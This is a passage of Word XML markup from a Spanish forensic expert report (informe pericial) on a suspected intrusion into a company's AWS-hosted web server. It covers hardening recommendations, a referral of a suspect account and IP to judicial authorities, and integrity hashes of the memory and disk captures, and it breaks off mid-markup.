        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Sandbox: Entorno de prueba aislado donde se pueden ejecutar programas o archivos sin afectar al sistema principal.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> previo al despliegue en producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19D68B" w14:textId="006800B1" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o permitiendo accesos mediante otras IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, esto puede ser mínimamente configurable desde el firewall</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Firewall: Dispositivo de seguridad de red que monitorea y controla el tráfico de red entrante y saliente basado en un conjunto de reglas de seguridad.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43072C3D" w14:textId="0C8F72DA" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proceso continuo de mejora del servidor mediante actualizaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B909B6E" w14:textId="5DC93191" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una gestión de usuarios del sistema evitando usuarios por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F0AED" w14:textId="47162FA8" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En caso de vulnerabilidad detectada sobre las aplicaciones, procesos o servicios que realiza, proceder a realizar un plan de contingencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC0714" w14:textId="0B5E5808" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041" w:rsidP="00315041">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Respecto al servidor web vulnerado, se recomienda la realización de un clon </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la generación de otro para tratar de llegar a las mismas acciones del </w:t>
      </w:r>
      <w:r w:rsidR="00B70C80" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">presunto atacante y saber </w:t>
      </w:r>
      <w:r w:rsidR="005579DA" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cómo</w:t>
      </w:r>
      <w:r w:rsidR="00B70C80" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se han realizado todas las acciones y </w:t>
      </w:r>
      <w:r w:rsidR="003E3C01" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detectar</w:t>
      </w:r>
      <w:r w:rsidR="00B70C80" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donde </w:t>
      </w:r>
      <w:r w:rsidR="003E3C01" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y como ha sido exactamente</w:t>
      </w:r>
      <w:r w:rsidR="00B70C80" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el fallo, ya que </w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>puede</w:t>
      </w:r>
      <w:r w:rsidR="00B70C80" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> haber otras vulnerabilidades no detectadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9E7DE" w14:textId="1A023DF1" w:rsidR="00BB78C7" w:rsidRPr="005579DA" w:rsidRDefault="003E3C01" w:rsidP="00315041">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para posibles responsabilidades legales sobre el usuario anatoly5676, se propone la elevación a autoridades judiciales de lo sucedido para poder depurar posibles responsabilidades penales. Estas acciones deberán de enfocarse de modo que la autoridad judicial solicite los datos a </w:t>
      </w:r>
      <w:r w:rsidR="005579DA" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del propietario de la máquina (virtual o física) con IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.195.165.56 entre el 30 de diciembre de 2018 y el 03 de enero de 2019.</w:t>
      </w:r>
      <w:r w:rsidR="005579DA" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> De este modo hay una posibilidad que de defina un posible investigado por los hechos ocurridos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE9F27" w14:textId="77777777" w:rsidR="003E3C01" w:rsidRPr="005579DA" w:rsidRDefault="003E3C01" w:rsidP="00315041">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F45ADAE" w14:textId="5F24D183" w:rsidR="00BB78C7" w:rsidRPr="003E3C01" w:rsidRDefault="00B70C80" w:rsidP="00BB78C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En XXXX , a XXX de XXXX de XXXXX.</w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="003E3C01">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E86523" w14:textId="2ACF51B2" w:rsidR="00B70C80" w:rsidRDefault="00B70C80" w:rsidP="00B70C80">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc155782520"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Informe pericial.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="616F6D21" w14:textId="77777777" w:rsidR="0089535F" w:rsidRDefault="0089535F" w:rsidP="0089535F"/>
    <w:p w14:paraId="6BE4FA24" w14:textId="10363CEB" w:rsidR="0089535F" w:rsidRPr="007471D6" w:rsidRDefault="0089535F" w:rsidP="0089535F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INFORME PERICIAL</w:t>
      </w:r>
      <w:r w:rsidRPr="007471D6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> QUE FORMULA EL D. JOSE ENRIQUE RODRÍGUEZ GONZÁLEZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007471D6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CON D.N.I. N.º XX.XXX.XXX-Y, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CISO DE LA EMPRESA GANGA.SITE,</w:t>
      </w:r>
      <w:r w:rsidRPr="007471D6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOBRE EL SERVIDOR ALOJADO EN AMAZON WEB SERVICES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7EA585" w14:textId="77777777" w:rsidR="0089535F" w:rsidRPr="000342A5" w:rsidRDefault="0089535F" w:rsidP="0089535F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000342A5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ANTECEDENTES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A28ED" w14:textId="77777777" w:rsidR="00890F70" w:rsidRPr="005579DA" w:rsidRDefault="00890F70" w:rsidP="00890F70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>La dirección de la empresa tiene serias sospechas, no probadas, de que han accedido a los sistemas de forma ilícita. Por lo que el gerente de la empresa , como CISO, que se compruebe si realmente han accedido, así como el método que han utilizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56567D" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="000342A5" w:rsidRDefault="00BB78C7" w:rsidP="00BB78C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000342A5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PROPÓSITO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348EEB4" w14:textId="077236B4" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7" w:rsidP="00890F70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dar a conocer a</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l personal especializado tanto del campo de la informática como autoridades judiciales, fiscales y letrados de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los detalles técnicos relativo al análisis forense realizado y propuestas de mejora.</w:t>
      </w:r>
      <w:r w:rsidR="00890F70" w:rsidRPr="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00890F70" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha procedido a realizar el análisis de</w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> las capturas facilitadas de</w:t>
      </w:r>
      <w:r w:rsidR="00890F70" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memoria 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890F70" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00890F70" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del disco duro del dispositivo afectado con intención de hacer un seguimiento de los hechos ocurridos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF5706" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="000342A5" w:rsidRDefault="00BB78C7" w:rsidP="00BB78C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000342A5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INFORME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA59AC" w14:textId="043940E3" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7" w:rsidP="00BB78C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, se enumeran los distintos indicio y elementos detectados en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la captura de la memoria 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Pr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispositivo investigado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EE2D1" w14:textId="0AAAFD4B" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha comprobado la integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida.</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0231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la captura de memoria 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Pr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> como de disco duro mediante hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de MD5 y SHA1.</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta verificación corrobora la integridad del documento y del correcto proceso de la cadena de custodia</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Cadena de custodia: Proceso documentado que rastrea la manipulación de evidencia, como datos digitales, desde su recolección hasta su presentación en un tribunal.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FBE3BA" w14:textId="39E008E1" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Memoria 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3E3C01">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5E166" w14:textId="001F7DF8" w:rsidR="003E3C01" w:rsidRDefault="003E3C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MD5:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3C01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>75a99b57032aa34ba19042ed85db273f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D08048" w14:textId="53305674" w:rsidR="003E3C01" w:rsidRDefault="003E3C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA1: </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cc1fad2af321b8c2ddf0103986e3b344eb8f2cc8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B55D96" w14:textId="115BB081" w:rsidR="003E3C01" w:rsidRDefault="003E3C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disco Duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E4F968" w14:textId="4AD09098" w:rsidR="003E3C01" w:rsidRDefault="003E3C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5: </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
